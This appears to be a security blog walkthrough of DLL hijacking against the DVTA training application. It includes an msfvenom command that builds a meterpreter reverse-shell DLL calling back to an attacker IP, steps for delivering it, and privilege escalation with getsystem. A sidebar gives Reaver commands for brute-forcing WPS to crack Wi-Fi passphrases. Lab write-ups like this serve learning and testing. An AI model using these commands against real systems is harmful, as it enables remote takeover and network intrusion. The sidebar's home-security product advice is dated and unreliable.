DLL Injection:DVTA Walk through

Identify where the missing DLL will be launched when DVTA.exe runs 

First of all, we need to launch DVTA.exe from the given path and, at the same time, launch Procmon on the windows machine with the admin user.

Once the Procmon is launched, go to the menu Filter > Filter to add the DVTA.exe processor name like the following.


We might want to add a few more in the filter to see only the specific path and the result status. Normally when performing DLL injection analysis, we need to look for the DLL that the application tries to load, and the result is always "Include Not Found" 

Once applied the filter the following path looks to be interested for DLL injection


Now we know the name of DLL that we want to hijack. So all we have to do is place our malicious DLL in that path and wait for victim to execute the application. We will be creating 64 bit payload with msfvenom. 

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.22.3 LPORT=4444 -f dll -o DWrite.dll


Now we need to deliver this malicious DLL payload to the victim machine. I will be using python3 http.server to transfer the file across. The following command will start the temporary Python3 based HTTP server

python3 -m http.server 8080

use IE browser to navigate to the Kali box and download the file.



ON the Kali box get reverse shell listener ready by using msf multi handler




As soon as the user execute the DVTA.exe on the computer, the meterpreter shell spawn up on the Kali box


Once interact with the meterpreter shell type getsystem to elevate the privilege into the system and we are now root of the system.





















Comments

Post a Comment

Popular posts from this blog

Cracking WPA / WPA 2 with Reaver (WPS brute forcing attack tool)

Requirements Alfa wireless USB network card model AWUS036NHR (must support packet injection) Make USB bootable Backtrack 5 R3 OS   Boot up Backtrack 5 R3 from the USB drive and type startx to get into GUI mode bring up Terminal session and type the following airmon-ng start wlan1 ( which create new virtual wireless interface called mon0) wash -i mon0 ( to find wireless AP that has WPS feature enabled) Pick any AP you want and run the following command from the terminal session reaver -i mon0 -b<bssid of the AP> -c <channel> -a -L -vv wait for 2 to 3 hr before reaver guess the target AP Passphrase.
Read more

Basic Computer security for Home Users

To protect your home PC against spy ware, viruses, Trojan, keylogger, and any malicious programs you need to follow the following steps Do not use internet explorer to surf the net use "Firefox 2.0" instead. you can download FREE version of Firefox 2.0 from www.mozilla.org/firefox. internet explorer has the biggest security vulnerability. Every computer that connects to the internet in any form MUST have a personal firewall. RECOMMENT PRODUCT Zonealarm personal firewall,symantec internet security, Trend Micro 2007, Every computer must have virus protection and it must be kept current. RECOMMENT PRODUCT Northern Antivirus, McAfee antivirus,AVG free anti virus(can be download from http://free.grisoft.com/freeweb.php/doc/20/lng/us/tpl/v5), Only open e-mail attachments when you are sure the sender is really who it appears to be Operate at least one anti-spyware/anti-adware program on your system. RECOMMENT PRODUCT Ad-aware personal edition (http://www.lavasoftusa.com/pr...
Read more